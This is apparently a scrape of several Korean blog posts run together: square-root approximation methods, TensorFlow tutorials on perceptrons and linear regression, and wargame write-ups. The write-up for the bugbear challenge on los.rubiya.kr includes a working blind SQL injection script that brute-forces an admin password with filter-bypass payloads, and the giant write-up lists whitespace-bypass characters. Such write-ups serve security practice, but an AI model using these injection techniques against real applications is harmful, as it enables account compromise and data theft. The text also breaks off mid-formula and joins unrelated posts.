
1. 뉴턴-랩슨 근사법(바빌로니아법)

2. 이분 탐색

3. 테일러 전개

세가지 방법을 주로 사용하는 것 같다.

 

1. 뉴턴-랩슨 근사법

구간 $\left[a, b\right]$에서 미분 가능한 함수 f(x) = 0의 근의 근사값을 구하는 방법을 사용한다.

상수 c에 대해 제곱근을 구하고자 한다면, $\sqrt{c}$는 $x^2-c=0$의 근으로 표현할 수 있다.

$f(x)=x^2-c$

$f'(x)=2x$

$\displaystyle x_{n}=x_{n-1}-\frac{f( x_{n-1})}{f'( x_{n-1})}$

$\displaystyle x_{n}=x_{n-1}-\frac{(x_{n-1})^2-c}{2x_{n-1}}$

원소 $x_0$는 구간 $\left[a, b\right]$에서 임의로 선택한다.

좀 더 정리해보자면

$\displaystyle x_{n} = x_{n-1} - \frac{x_{n-1} - \frac{c}{x_{n-1}}}{2}$

$\displaystyle x_{n} = \frac{x_{n-1} + \frac{c}{x_{n-1}}}{2}$

가 된다. 이를 코드로 작성해보면

def sqrt(c, n=4):
  x = c
  
  for i in range(0, n):
    x = (x + c / x) / 2
  
  return x
  
sqrt(2)

로 나타낼 수 있게 된다.

 

2. 이분탐색

알고리즘에서 이분탐색은 너무 유명하기도 하고 간단해서 코드만 보여주겠다.

0부터 c 사이의 범위에서 이분탐색을 진행하면 된다.

def sqrt(c, n=100):
  l = 0
  r = c
  for i in range(0, n):
    mid = (l + r) / 2
    if mid * mid == c:
      break
    if mid * mid < c:
      l = mid
    if mid * mid > c:
      r = mid
  return mid

 

3. 테일러 전개

테일러 급수를 통해서 sin, cos 함수를 근사하는데 자주 사용하는데, 이러한 근사를 제곱근에서도 활용할 수 있다.

$f(x) = x^{\frac{1}{2}}$를 테일러 급수로 만들면

$f(x) = x

728x90

퍼셉트론은 프랑크 로젠블라트(Frank Rosenblatt)가 고안한 인공 신경망으로 실제 뇌의 뉴런과 비슷하게 동작합니다.

퍼셉트론 모델은 여러 입력값을 받아 가중치를 곱한 뒤 합하여 활성함수에 넣어 결과를 얻어냅니다.

이 간단한 단층 퍼셉트론을 이용하여 비트연산을 학습시켜 보겠습니다.

학습시키기 전에 학습시킬 데이터를 생성해야 하기 때문에 데이터를 생성해주는 함수를 만들겠습니다.

def generate_or_data():
    x = np.random.randint(0, 2, size=(100, 2))
    y = np.array([x[:, 0] | x[:, 1]]).T
    return x, y

def generate_and_data():
    x = np.random.randint(0, 2, size=(100, 2))
    y = np.array([x[:, 0] & x[:, 1]]).T
    return x, y

def generate_xor_data():
    x = np.random.randint(0, 2, size=(100, 2))
    y = np.array([x[:, 0] ^ x[:, 1]]).T
    return x, y

def plot_data(x, y):
    plt.scatter(x[:, 0], x[:, 1], c=y[:, 0], cmap=plt.cm.bwr)
    plt.show()

plot_data(*generate_or_data())
plot_data(*generate_and_data())
plot_data(*generate_xor_data())

OR

class Model(tf.Module):
    def __init__(self):
        self.w = tf.Variable(tf.random.uniform(shape=[2, 1], minval=-1, maxval=1))
        self.b = tf.Variable(tf.random.uniform(shape=[1], minval=-1, maxval=1))

    def __call__(self, x):
        y = tf.sigmoid(tf.matmul(x, self.w) + self.b)
        return y

def loss_fn(x, y):
    return tf.reduce_mean(tf.square(model(x) - y))

학습시킬 모델과 손실함수를 정의 해 주겠습니다.

비트연산자는 두개의 입력을 받아 하나의 출력을 내보내기 때문에

가중치는 (2, 1) 형태의 배열이 필요합니다.

model = Model()

def train(x, y, lr=0.1):
    with tf.GradientTape() as tape:
        loss = loss_fn(x, y)
    grads = tape.gradient(loss, [model.w, model.b])
    model.w.assign_sub(lr * grads[0])
    model.b.assign_sub(lr * grads[1])

def predict(x):
    return model(x)

def accuracy(x, y):
    return tf.reduce_mean(tf.cast(tf.equal(tf.round(predict(x)), y), tf.float32))

모델을 생성하고, 학습을 시켜줄 경사하강법 알고리즘으로 작성된 함수를 만들어 줍니다.

그 뒤 모델의 정확도를 구하기 위하여 정확도를 계산해주는 함수를 만들어 줍니다.

x, y = generate_or_data()

x = tf.constant(x, dtype=tf.float32)
y = tf.constant(y, dtype=tf.float32)

plot_data(x, y)

for i in range(1000):
    train(x, y)
    if i % 100 == 0:
        print('loss: {:.4f}, accuracy: {:.4f}'.format(loss_fn(x, y), accuracy(x, y)))

데이터를 생성하고 학습시키면 정확도가 1이 나올정도로 정확하게 학습됐다는건 알 수 있게 됐습니다.

어떤 방식으로 값을 판단하는지 알아보기 위해 출력되는 값의 정도를 투명도로 정해서 어떻게 나오는지 보겠습니다.

def plot_decision_boundary():
    x = np.linspace(0, 1, 100)
    y = np.linspace(0, 1, 100)
    x = tf.constant(x, dtype=tf.float32)
    y = tf.constant(y, dtype=tf.float32)
    xx, yy = np.meshgrid(x, y)
    z = predict(np.c_[xx.ravel(), yy.ravel()])
    z = z.numpy().reshape(xx.shape)
    plt.contourf(xx, yy, z, cmap=plt.cm.bwr, alpha=0.2)
    plt.show()

plot_decision_boundary()

AND

or 코드를 가져다 사용하겠습니다.

model = Model()

x, y = generate_and_data()

x = tf.constant(x, dtype=tf.float32)
y = tf.constant(y, dtype=tf.float32)

plot_data(x, y)

for i in range(1000):
    train(x, y)
    if i % 100 == 0:
        print('loss: {:.4f}, accuracy: {:.4f}'.format(loss_fn(x, y), accuracy(x, y)))

plot_decision_boundary()

변한건 데이터를 생성해주는게 or에서 and로 변한 것 밖에 없습니다.

학습시켜보면 아까전 or과 다르게 (0, 1), (1, 0) 일때가 빨간색에서 파란색으로 변했습니다.

이걸로 AND도 학습이 제대로 되었다는걸 볼 수 있습니다.

XOR

model = Model()

x, y = generate_xor_data()

x = tf.constant(x, dtype=tf.float32)
y = tf.constant(y, dtype=tf.float32)

plot_data(x, y)

for i in range(10000):
    train(x, y)
    if i % 100 == 0:
        print('loss: {:.4f}, accuracy: {:.4f}'.format(loss_fn(x, y), accuracy(x, y)))

plot_decision_boundary()

데이터를 xor로 바꿔서 학습시켜 보겠습니다. 학습도 10배 더 늘렸습니다.

이번엔 정확도도 0.8로 나오고 판정 기준도 뭔가 이상한걸 볼 수 있습니다.

단층 퍼셉트론으로는 XOR 문제를 해결할 수 없기 때문입니다.

단층 퍼셉트론은 최고차항이 1로 일차 함수인데 일차 함수로는 아무리 선을 잘 그어봐도 XOR을 판정을 내릴 수 없습니다.

다층 퍼셉트론을 이용해서 XOR 문제를 풀어보겠습니다.

class Layer(tf.Module):
    def __init__(self, out_dim, weight_init=tf.random.uniform, activation=tf.identity):
        self.out_dim = out_dim
        self.weight_init = weight_init
        self.activation = activation
        self.w = None
        self.b = None

    @tf.function
    def __call__(self, x):
        self.in_dim = x.shape[1]
        if self.w is None:
            self.w = tf.Variable(self.weight_init(shape=[self.in_dim, self.out_dim]))
        if self.b is None:
            self.b = tf.Variable(tf.zeros(shape=[self.out_dim]))
        z = tf.add(tf.matmul(x, self.w), self.b)
        return self.activation(z)

class MLP(tf.Module):
    def __init__(self, layers):
        self.layers = layers

    @tf.function
    def __call__(self, x, preds=False): 
        for layer in self.layers:
            x = layer(x)
        return x

model = MLP([
    Layer(2, activation=tf.sigmoid),
    Layer(1, activation=tf.sigmoid)
])

x, y = generate_xor_data()

x = tf.constant(x, dtype=tf.float32)
y = tf.constant(y, dtype=tf.float32)

plot_data(x, y)

def accuracy(x, y):
    return tf.reduce_mean(tf.cast(tf.equal(tf.round(model(x)), y), tf.float32))

def loss_fn(x, y):
    return tf.reduce_mean(tf.square(model(x) - y))

def train(x, y, lr=0.1):
    with tf.GradientTape() as tape:
        loss = loss_fn(x, y)
    optimizer = tf.keras.optimizers.Adam(learning_rate=lr)
    grads = tape.gradient(loss, model.trainable_variables)
    optimizer.apply_gradients(zip(grads, model.trainable_variables))

def plot_decision_boundary():
    x = np.linspace(0, 1, 100)
    y = np.linspace(0, 1, 100)
    x = tf.constant(x, dtype=tf.float32)
    y = tf.constant(y, dtype=tf.float32)
    xx, yy = np.meshgrid(x, y)
    z = model(np.c_[xx.ravel(), yy.ravel()])
    z = z.numpy().reshape(xx.shape)
    print(z)
    plt.contourf(xx, yy, z, cmap=plt.cm.bwr, alpha=0.2)
    plt.show()

for i in range(1000):
    train(x, y)
    if i % 100 == 0:
        print('loss: {:.4f}, accuracy: {:.4f}'.format(loss_fn(x, y), accuracy(x, y)))

plot_decision_boundary()

Gradient Descent를 사용하면 학습이 잘 되지 않아 Adam Optimizer를 사용했습니다.

아주 아름답게 학습되서 양쪽 끝만 빨간색인걸 볼 수 있습니다.

이러한 것도 볼 수 있습니다.

BitwisePerceptron.ipynb
0.15MB

728x90

'인공지능' 카테고리의 다른 글

선형 회귀(Linear Regression)  (1) 2022.10.28

선형 회귀(Linear Regression)는 지도학습(Supervised Learning)의 일종으로 단순 선형 회귀(Simple)와 다중 선형 회귀(Multiple)가 있습니다.

선형 회귀는 선형이라는 이름에 맞게 일차원 함수의 형태로 나타납니다. 

 

단순 선형 회귀(Simple Linear Regression)

단순 선형 회귀는 하나의 종속변수(Dependent Variable)와 하나의 독립변수(Independent Variable) 사이의 관계를 모델링 하는 기법입니다.

이걸 Tensorflow를 이용하여 구현하며 알아보도록 하겠습니다.

일단 선형 회귀를 하기 위해선 데이터가 필요합니다.

y = 2x + 3을 기준으로 랜덤한 값을 더해서 데이터를 만들어 보겠습니다.

import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
@tf.function
def f(x):
    y = 2 * x + 3
    return y

x = tf.linspace(0, 5, 101)
x = tf.cast(x, tf.float32)
y = f(x) + tf.random.normal(shape=[101])

그리고 이 데이터를 예측할 모델과 가설(Hypothesis)를 만들어 보겠습니다.

class Model(tf.Module):
    def __init__(self, seed=22):
        rand_init = tf.random.uniform(shape=[2], minval=0., maxval=5., seed=seed)

        self.w = tf.Variable(rand_init[0])
        self.b = tf.Variable(rand_init[1])
    
    @tf.function
    def __call__(self, x):
        y = self.w * x + self.b
        return y

지금은 가중치(Weight, w)와 편향(Bias, b)를 랜덤값으로 초기화 해 뒀기 때문에 실제 값과 동떨어진 가설 그래프가 나올 것 입니다.

이제 이 그래프가 얼마나 실제 값과 동떨어져 있는지를 나타내주는 비용(Cost) 또는 손실(Loss)라 부르는 함수를 만들어 줄 것 입니다.

예측값과 실제값의 차를 구하기 위해서 주로 절대값을 이용하거나 제곱을 이용하는데, 제곱이 더 계산하기 편하기 때문에 제곱을 이용한 평균 제곱 오차(Mean Squared Error)라는 방식을 사용할 것 입니다.

def loss(y, y_pred):
    return tf.reduce_mean(tf.square(y - y_pred))

print(loss(y, model(x)))

tf.Tensor(37.40411, shape=(), dtype=float32)

37.40411이 예측값과 실제값을 손실함수에 넣어서 나온 결과입니다.

from mpl_toolkits.mplot3d import Axes3D
from tqdm import tqdm

ax = plt.subplot(111, projection='3d')

w = np.linspace(0, 5, 101)
b = np.linspace(0, 5, 101)

W, B = np.meshgrid(w, b)

Z = np.zeros(shape=[101, 101])

pbar = tqdm(total=101*101)
for i in range(101):
    for j in range(101):
        model = Model()
        model.w = W[i, j]
        model.b = B[i, j]
        Z[i, j] = loss(y, model(x))
        pbar.update(1)

ax.plot_surface(W, B, Z, cmap='viridis')
ax.set_xlabel('w')
ax.set_ylabel('b')
ax.set_zlabel('loss')

그래프 이미지가 조금 잘리긴 했지만 대충 어느 정도에서 loss함수가 최소값을 갖는지 알아볼 수 있습니다.

이제 가설 함수의 가중치와 편향을 조정해 loss를 최소로 만들어야 하는데 이를 해주는 알고리즘이 Optimizer라 불리는 경사하강법, Adam등의 것들 입니다.

model = Model()

with tf.GradientTape() as tape:
    tape.watch(model.variables)
    loss_v = loss(y, model(x))
print(tape.gradient(loss_v, model.variables))

tensorflow에서는 자동 미분을 지원해주기 때문에 위와 같이 코드를 작성하면 각각의 편미분값을 알 수 있습니다.

하지만 w와 b가 랜덤인 상태이기 때문에 값이 랜덤하게 나올것입니다.

경사하강법에 따라 미분값과 learning rate를 곱하여 각 변수에서 빼주면 됩니다.

epochs = 100
learning_rate = 0.01

model = Model()

with tf.GradientTape() as tape:
    tape.watch(model.variables)
    batch_loss = loss(y, model(x))
grad = tape.gradient(batch_loss, model.variables)
print(grad)
model.w.assign_sub(learning_rate * grad[0])
model.b.assign_sub(learning_rate * grad[1])

with tf.GradientTape() as tape:
    tape.watch(model.variables)
    batch_loss = loss(y, model(x))
grad = tape.gradient(batch_loss, model.variables)
print(grad)
model.w.assign_sub(learning_rate * grad[0])
model.b.assign_sub(learning_rate * grad[1])

with tf.GradientTape() as tape:
    tape.watch(model.variables)
    batch_loss = loss(y, model(x))
print(tape.gradient(batch_loss, model.variables))
(<tf.Tensor: shape=(), dtype=float32, numpy=-5.1804476>, <tf.Tensor: shape=(), dtype=float32, numpy=-12.510265>)
(<tf.Tensor: shape=(), dtype=float32, numpy=-4.671219>, <tf.Tensor: shape=(), dtype=float32, numpy=-11.017024>)
(<tf.Tensor: shape=(), dtype=float32, numpy=-4.217317>, <tf.Tensor: shape=(), dtype=float32, numpy=-9.6837435>)

몇번 돌려보게 되면 미분값이 점점 0에 근접해간다는걸 알 수 있습니다.

이걸 한 100번정도 돌리게 되면 loss를 거의 최소로 만들 수 있습니다.

epochs = 100
learning_rate = 0.01
losses = []

model = Model()

for epoch in range(epochs):
    with tf.GradientTape() as tape:
        tape.watch(model.variables)
        batch_loss = loss(y, model(x))
    grads = tape.gradient(batch_loss, model.variables)
    for g,v in zip(grads, model.variables):
        v.assign_sub(learning_rate*g)

    loss_v = loss(y, model(x))
    losses.append(loss_v)
    if epoch % 10 == 0:
        print(f'Loss of step {epoch}: {loss_v.numpy():0.3f}')

plt.plot(range(epochs), losses)
plt.xlabel("Epoch")
plt.ylabel("Loss (MSE)")

학습된 결과를 그래프로 찍어보겠습니다.

plt.figure()
plt.plot(x, y, '.')
plt.plot(x, f(x))
plt.plot(x, model(x))

그리고 원본 그래프와 loss 를 비교해 보겠습니다.

print(loss(y, model(x)))
print(loss(y, f(x)))

tf.Tensor(0.89216924, shape=(), dtype=float32)
tf.Tensor(0.8852339, shape=(), dtype=float32)

0.89216924와 0.8852339로 학습된 모델의 loss가 약간 더 크긴 하지만 학습이 잘 됐다고 볼 수 있겠습니다.

SimpleLinearRegression.ipynb
0.22MB

다중 선형 회귀(Multiple Linear Regression)

import tensorflow as tf
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
@tf.function
def f(x, y):
    z = 2 * x + y + 3
    return z

x = tf.linspace(0, 5, 101)
x = tf.cast(x, tf.float32)
y = tf.linspace(0, 5, 101)
y = tf.cast(y, tf.float32)

z = f(x, y) + tf.random.normal(shape=[101])

fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x, y, z, c='r', marker='o')

class Model(tf.Module):
    def __init__(self, seed=22):
        rand_init = tf.random.uniform(shape=[3], minval=0., maxval=5., seed=seed)

        self.w_x = tf.Variable(rand_init[0])
        self.w_y = tf.Variable(rand_init[1])
        self.b = tf.Variable(rand_init[2])
    
    @tf.function
    def __call__(self, x, y):
        z = self.w_x * x + self.w_y * y + self.b
        return z
model = Model()

fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x, y, z, c='r', marker='o')
ax.plot3D(x, y, f(x, y), c='r')
ax.plot3D(x, y, model(x, y), c='b')

def loss(z, z_pred):
    return tf.reduce_mean(tf.square(z - z_pred))

print(loss(z, model(x, y)))
tf.Tensor(194.73457, shape=(), dtype=float32)
epochs = 100
learning_rate = 0.01

model = Model()

with tf.GradientTape() as tape:
    tape.watch(model.variables)
    batch_loss = loss(z, model(x, y))
grads = tape.gradient(batch_loss, model.variables)
print(grads)
for g,v in zip(grads, model.variables):
    v.assign_sub(learning_rate*g)

with tf.GradientTape() as tape:
    tape.watch(model.variables)
    batch_loss = loss(z, model(x, y))
grads = tape.gradient(batch_loss, model.variables)
print(grads)
for g,v in zip(grads, model.variables):
    v.assign_sub(learning_rate*g)

with tf.GradientTape() as tape:
    tape.watch(model.variables)
    batch_loss = loss(z, model(x, y))
print(tape.gradient(batch_loss, model.variables))
(<tf.Tensor: shape=(), dtype=float32, numpy=-12.747607>, <tf.Tensor: shape=(), dtype=float32, numpy=-38.576015>, <tf.Tensor: shape=(), dtype=float32, numpy=-38.576015>)
(<tf.Tensor: shape=(), dtype=float32, numpy=-8.635053>, <tf.Tensor: shape=(), dtype=float32, numpy=-25.01567>, <tf.Tensor: shape=(), dtype=float32, numpy=-25.01567>)
(<tf.Tensor: shape=(), dtype=float32, numpy=-5.9607844>, <tf.Tensor: shape=(), dtype=float32, numpy=-16.203669>, <tf.Tensor: shape=(), dtype=float32, numpy=-16.203669>)
epochs = 1000
learning_rate = 0.01
losses = []

model = Model()

for epoch in range(epochs):
    with tf.GradientTape() as tape:
        tape.watch(model.variables)
        batch_loss = loss(z, model(x, y))
    grads = tape.gradient(batch_loss, model.variables)
    for g,v in zip(grads, model.variables):
        v.assign_sub(learning_rate*g)

    loss_v = loss(z, model(x,y ))
    losses.append(loss_v)
    if epoch % 10 == 0:
        print(f'Loss of step {epoch}: {loss_v.numpy():0.3f}')

plt.plot(range(epochs), losses)
plt.xlabel("Epoch")
plt.ylabel("Loss (MSE)")

fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x, y, z, c='r', marker='o')
ax.plot3D(x, y, f(x, y), c='r')
ax.plot3D(x, y, model(x, y), c='b')

print(loss(z, model(x, y)))
print(loss(z, f(x,y )))
tf.Tensor(0.9223384, shape=(), dtype=float32)
tf.Tensor(0.9513635, shape=(), dtype=float32)

MultipleLinearRegression.ipynb
0.26MB

728x90

'인공지능' 카테고리의 다른 글

퍼셉트론(Perceptron) + 비트연산(Bitwise Operation)  (0) 2022.10.29

14

var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;

= 540

15

https://webhacking.kr/challenge/js-2/?getFlag로 가자

16

keyCode가 124일때 풀린다.

| 를 누르면 풀린다.

17

7809297.1

728x90

'해킹 > writeup' 카테고리의 다른 글

los.rubiya.kr - giant  (0) 2021.08.29
los.rubiya.kr - bugbear  (0) 2021.08.29
los.rubiya.kr - darkknight  (0) 2021.08.29
webhacking.kr - 52  (0) 2021.08.25
dreamhack.io - web-ssrf  (0) 2021.08.25

%20 %09 %0a %0b %0c %0d %a0 /**/

이 중 쓰면 되는데

%20은 스페이스바

%09는 \t(tab)

%0a는 \n(LF Line Feed)

%0b는 버티컬 탭(Vertical Tab)

%0c는 폼 피드(Form Feed)

%0d는 \r(CR Carriage Return)

스페이스바, \t, \n, \r 를 필터링 하고, 1글자로만 써야 하므로 /**/도 쓰면 안된다.

그래서 %0b, %0c를 쓸 수 있다.

728x90

'해킹 > writeup' 카테고리의 다른 글

webhacking.kr - 14, 15, 16, 17  (1) 2021.08.29
los.rubiya.kr - bugbear  (0) 2021.08.29
los.rubiya.kr - darkknight  (0) 2021.08.29
webhacking.kr - 52  (0) 2021.08.25
dreamhack.io - web-ssrf  (0) 2021.08.25
import requests

pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "bugbear_19ebf8c8106a5323825b5dfa1b07ac1f"
code = '0||id%0ain%0a("admin")'

space = '%0a'
andsign = '%26%26'
equal = 'in'
_substr = 'mid'
_ascii = 'ord'

length = 0

print("find length")
for i in range(1, 32):
    url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
        f'{code}{space}{andsign}{space}length(pw){space}{equal}{space}({str(i)})'
    print(url)
    res = requests.get(url, cookies=cookie)
    if "Hello admin" in res.text:
        length = i
        print(i)
        break;

print("find password")
for i in range(1, length + 1):
    for j in range(32, 128):
        ch = chr(j).replace('"', '\\"')
        url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
            f'{code}{space}{andsign}{space}{_substr}(pw,{str(i)},1){space}{equal}{space}("{ch}")'
        print(url)
        res = requests.get(url, cookies=cookie)
        if "Hello admin" in res.text:
            pw += chr(j)
            print(pw)
            break

ord 빼버리고 그냥 문자열이랑 비교하고

비교는 in 으로 하고,

스페이스바는 \n 개행으로 하고

and와 or은 &&와 ||로 쓴다.

728x90

'해킹 > writeup' 카테고리의 다른 글

webhacking.kr - 14, 15, 16, 17  (1) 2021.08.29
los.rubiya.kr - giant  (0) 2021.08.29
los.rubiya.kr - darkknight  (0) 2021.08.29
webhacking.kr - 52  (0) 2021.08.25
dreamhack.io - web-ssrf  (0) 2021.08.25

+ Recent posts